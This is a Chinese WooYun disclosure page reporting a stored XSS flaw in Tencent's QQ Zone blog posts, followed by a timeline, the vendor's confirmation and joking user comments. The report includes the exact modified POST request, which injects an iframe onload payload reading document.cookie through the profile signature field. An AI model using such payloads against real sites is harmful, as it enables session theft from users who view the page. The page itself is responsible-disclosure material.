当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040641

漏洞标题:QQ空间日志存储XSS

相关厂商:腾讯

漏洞作者: neobyte

提交时间:2013-10-22 14:04

修复时间:2013-12-06 14:04

公开时间:2013-12-06 14:04

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-22: 细节已通知厂商并且等待厂商处理中
2013-10-22: 厂商已经确认,细节仅向厂商公开
2013-11-01: 细节向核心白帽子及相关领域专家公开
2013-11-11: 细节向普通白帽子公开
2013-11-21: 细节向实习白帽子公开
2013-12-06: 细节向公众公开

简要描述:

QQ空间日志存储XSS, 阅读他人日志自动触发

详细说明:

修改个人空间设置中的签名信息, 随便填写,拦截POST包, 修改signature参数如下(其他参数不变):

POST http://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=1442090271 HTTP/1.1
......
qzreferrer=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fv6%2Fsetting%2Fprofile%2Fprofile.html%3Ftab%3Dspace&spacename=55&desc=11&signature=112233%E2%80%90x3ciframe onload%3dalert(document.cookie) %E2%80%90x3e&mb=8192&uin=???&pageindex=3&fupdate=1


然后发表带签名的日志,其他用户查看日志时,触发XSS.

漏洞证明:

qq log.png

修复方案:

不太了解后台逻辑,不好评论:)

版权声明:转载请注明来源 neobyte@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-10-22 15:10

厂商回复:

感谢反馈,我们正在跟进修复

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-22 14:05 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    真是要超越2哥的节奏啊!碉堡了

  2. 2013-10-22 14:11 | neobyte ( 普通白帽子 | Rank:117 漏洞数:11 )

    @p0di 其实是从2哥那学的

  3. 2013-10-22 14:18 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    @neobyte 有钱了也去拜师去= =....

  4. 2013-10-22 14:18 | 老川 ( 路人 | Rank:2 漏洞数:1 | 专注于S2漏洞)

    = =!我也想学习XSS

  5. 2013-10-22 14:19 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @neobyte @p0di 你们错了,其实是二哥马甲!

  6. 2013-10-22 14:21 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @寂寞的瘦子 这个分析有道理

  7. 2013-10-22 14:42 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @老川 = =!我也想学习XSS

  8. 2013-10-22 14:59 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小川 想学XSS,给二哥介绍个对象,就妥妥的了。。

  9. 2013-10-22 15:32 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @小川 @老川 这什么情况。。。哈哈哈

  10. 2013-10-22 15:40 | 老川 ( 路人 | Rank:2 漏洞数:1 | 专注于S2漏洞)

    = =!我是新近的老川 求提携

  11. 2013-10-22 16:27 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @niliu @老川 这哥们的名字跟我的马甲似的,我也有粉丝了

  12. 2013-10-22 16:33 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @小川 我以为就是你的马甲呢。。。

  13. 2013-10-22 16:34 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @小川 你尽然拿自己马甲说是I自己粉丝!

  14. 2013-10-22 16:37 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @niliu 其实老川才是真正的马。小川是他马甲

  15. 2013-10-22 16:40 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @寂寞的瘦子 @老川 @小川 @大川 @中川 @幼川

  16. 2013-10-22 17:05 | 老川 ( 路人 | Rank:2 漏洞数:1 | 专注于S2漏洞)

    = =!我真是菜鸟 你们有Q群吗? 我能加吗?

  17. 2013-11-14 09:55 | 核攻击 ( 实习白帽子 | Rank:35 漏洞数:7 | 统治全球,奴役全人类!毁灭任何胆敢阻拦的...)

    mark